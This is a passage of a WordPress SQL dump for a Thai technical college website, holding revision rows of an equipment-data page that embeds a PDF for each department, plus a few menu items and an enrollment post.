#0000ff;\">แผนกวิชาปิโตรเคมี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการตลาด</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการเลขานุการ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาโลจิสติกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%82%E0%B8%A5%E0%B8%88%E0%B8%B4%E0%B8%AA%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคหกรรมศาสตร์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาผ้าและเครื่องแต่งกาย</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9C%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอาหารและโภชนาการ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9C%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการโรงแรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%82%E0%B8%A3%E0%B8%87%E0%B9%81%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการท่องเที่ยว</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%A2%E0%B8%A7.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยีสารสนเทศ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%99%E0%B9%80%E0%B8%97%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชา Central Lab</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2-Central-Lab.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาคณิตศาสตร์</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาภาษาอังกฤษ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาภาษาไทย</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาวิทยาศาสตร์</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสังคมศึกษา</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาพลานามัย</span></h3>', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-02-28 13:20:45', '2018-02-28 06:20:45', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(1438, 3, '2018-02-28 13:25:06', '2018-02-28 06:25:06', '<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรม</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างยนต์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%A2%E0%B8%99%E0%B8%95%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างกล</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B8%81%E0%B8%A5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาช่างเชื่อม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%8A%E0%B9%88%E0%B8%B2%E0%B8%87%E0%B9%80%E0%B8%8A%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาไฟฟ้า</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%84%E0%B8%9F%E0%B8%9F%E0%B9%89%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอิเล็กทรอนิกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%AD%E0%B8%B4%E0%B9%80%E0%B8%A5%E0%B9%87%E0%B8%81%E0%B8%97%E0%B8%A3%E0%B8%AD%E0%B8%99%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาก่อสร้าง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B9%88%E0%B8%AD%E0%B8%AA%E0%B8%A3%E0%B9%89%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเครื่องมือวัดและควบคุม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B8%A1%E0%B8%B7%E0%B8%AD%E0%B8%A7%E0%B8%B1%E0%B8%94%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B8%84%E0%B8%A7%E0%B8%9A%E0%B8%84%E0%B8%B8%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาปิโตรเคมี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9B%E0%B8%B4%E0%B9%82%E0%B8%95%E0%B8%A3%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเคมีอุตสาหกรรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%84%E0%B8%A1%E0%B8%B5%E0%B8%AD%E0%B8%B8%E0%B8%95%E0%B8%AA%E0%B8%B2%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยียาง</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%A2%E0%B8%B2%E0%B8%87.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาพาณิชยกรรม/บริหารธุรกิจ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการบัญชี</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%9A%E0%B8%B1%E0%B8%8D%E0%B8%8A%E0%B8%B5.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการตลาด</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%95%E0%B8%A5%E0%B8%B2%E0%B8%94.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการเลขานุการ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%80%E0%B8%A5%E0%B8%82%E0%B8%B2%E0%B8%99%E0%B8%B8%E0%B8%81%E0%B8%B2%E0%B8%A3.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคอมพิวเตอร์ธุรกิจ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AD%E0%B8%A1%E0%B8%9E%E0%B8%B4%E0%B8%A7%E0%B9%80%E0%B8%95%E0%B8%AD%E0%B8%A3%E0%B9%8C%E0%B8%98%E0%B8%B8%E0%B8%A3%E0%B8%81%E0%B8%B4%E0%B8%88.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาโลจิสติกส์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%82%E0%B8%A5%E0%B8%88%E0%B8%B4%E0%B8%AA%E0%B8%95%E0%B8%B4%E0%B8%81%E0%B8%AA%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาคหกรรมศาสตร์</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาคหกรรมศาสตร์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%84%E0%B8%AB%E0%B8%81%E0%B8%A3%E0%B8%A3%E0%B8%A1%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาผ้าและเครื่องแต่งกาย</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9C%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาอาหารและโภชนาการ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%9C%E0%B9%89%E0%B8%B2%E0%B9%81%E0%B8%A5%E0%B8%B0%E0%B9%80%E0%B8%84%E0%B8%A3%E0%B8%B7%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%81%E0%B8%95%E0%B9%88%E0%B8%87%E0%B8%81%E0%B8%B2%E0%B8%A2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาอุตสาหกรรมท่องเที่ยว</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการโรงแรม</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B9%82%E0%B8%A3%E0%B8%87%E0%B9%81%E0%B8%A3%E0%B8%A1.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาการท่องเที่ยว</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%97%E0%B9%88%E0%B8%AD%E0%B8%87%E0%B9%80%E0%B8%97%E0%B8%B5%E0%B9%88%E0%B8%A2%E0%B8%A7.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">ประเภทวิชาเทคโนโลยีสารสนเทศและการสื่อสาร</span></h3>\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชาเทคโนโลยีสารสนเทศ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2%E0%B9%80%E0%B8%97%E0%B8%84%E0%B9%82%E0%B8%99%E0%B9%82%E0%B8%A5%E0%B8%A2%E0%B8%B5%E0%B8%AA%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%99%E0%B9%80%E0%B8%97%E0%B8%A8.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">แผนกวิชา Central Lab</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B9%81%E0%B8%9C%E0%B8%99%E0%B8%81%E0%B8%A7%E0%B8%B4%E0%B8%8A%E0%B8%B2-Central-Lab.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสามัญ</span></h3>\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาคณิตศาสตร์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%84%E0%B8%93%E0%B8%B4%E0%B8%95%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาภาษาอังกฤษ</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B8%AD%E0%B8%B1%E0%B8%87%E0%B8%81%E0%B8%A4%E0%B8%A9.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาภาษาไทย</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A0%E0%B8%B2%E0%B8%A9%E0%B8%B2%E0%B9%84%E0%B8%97%E0%B8%A2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาวิทยาศาสตร์</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%A7%E0%B8%B4%E0%B8%97%E0%B8%A2%E0%B8%B2%E0%B8%A8%E0%B8%B2%E0%B8%AA%E0%B8%95%E0%B8%A3%E0%B9%8C.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาสังคมศึกษา</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%AA%E0%B8%B1%E0%B8%87%E0%B8%84%E0%B8%A1%E0%B8%A8%E0%B8%B6%E0%B8%81%E0%B8%A9%E0%B8%B2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]\r\n<h3><span style=\"color: #0000ff;\">หมวดวิชาพลานามัย</span></h3>\r\n[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%AB%E0%B8%A1%E0%B8%A7%E0%B8%94%E0%B8%9E%E0%B8%A5%E0%B8%B2%E0%B8%99%E0%B8%B2%E0%B8%A1%E0%B8%B1%E0%B8%A2.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ข้อมูลครุภัณฑ์ ปีการศึกษา 2560', '', 'inherit', 'closed', 'closed', '', '1399-revision-v1', '', '', '2018-02-28 13:25:06', '2018-02-28 06:25:06', '', 1399, 'http://www.technicrayong.ac.th/1399-revision-v1/', 0, 'revision', '', 0),
(1439, 3, '2018-02-28 14:04:16', '2018-02-28 07:04:16', '', 'ติดต่อเรา', '', 'publish', 'closed', 'closed', '', '%e0%b8%95%e0%b8%b4%e0%b8%94%e0%b8%95%e0%b9%88%e0%b8%ad%e0%b9%80%e0%b8%a3%e0%b8%b2', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=1439', 101, 'nav_menu_item', '', 0),
(1440, 3, '2018-02-28 14:04:16', '2018-02-28 07:04:16', '', 'เปลี่ยน Password WiFi', '', 'publish', 'closed', 'closed', '', '%e0%b9%80%e0%b8%a7%e0%b9%87%e0%b8%9a%e0%b8%9a%e0%b8%ad%e0%b8%a3%e0%b9%8c%e0%b8%94', '', '', '2022-04-29 12:30:36', '2022-04-29 05:30:36', '', 0, 'http://www.technicrayong.ac.th/?p=1440', 103, 'nav_menu_item', '', 0),
(1441, 3, '2018-02-28 15:23:39', '2018-02-28 08:23:39', '[pdfjs-viewer url=\"%2Fwp-content%2Fuploads%2F2018%2F02%2F%E0%B8%82%E0%B8%B1%E0%B9%89%E0%B8%99%E0%B8%95%E0%B8%AD%E0%B8%99%E0%B8%81%E0%B8%B2%E0%B8%A3%E0%B8%AA%E0%B8%A1%E0%B8%B1%E0%B8%84%E0%B8%A3%E0%B9%80%E0%B8%A3%E0%B8%B5%E0%B8%A2%E0%B8%99.pdf\" viewer_width=100% viewer_height=1360px fullscreen=true download=true print=true]', 'ขั้นตอนการสมัครเรียน ประจำปีการศึกษา 2561', '', 'publish', 'closed', 'open', '', '%e0%b8%82%e0%b8%b1%e0%b9%89%e0%b8%99%e0%b8%95%e0%b8%ad%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%aa%e0%b8%a1%e0%b8%b1%e0%b8%84%e0%b8%a3%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99-%e0%b8%9b%e0%b8%a3', '', '', '2018-02-28 15:26:12', '2018-02-28 08:26:12', '', 0, 'http://www.technicrayong.ac.th/?p=1441', 457, 'post', '', 0),
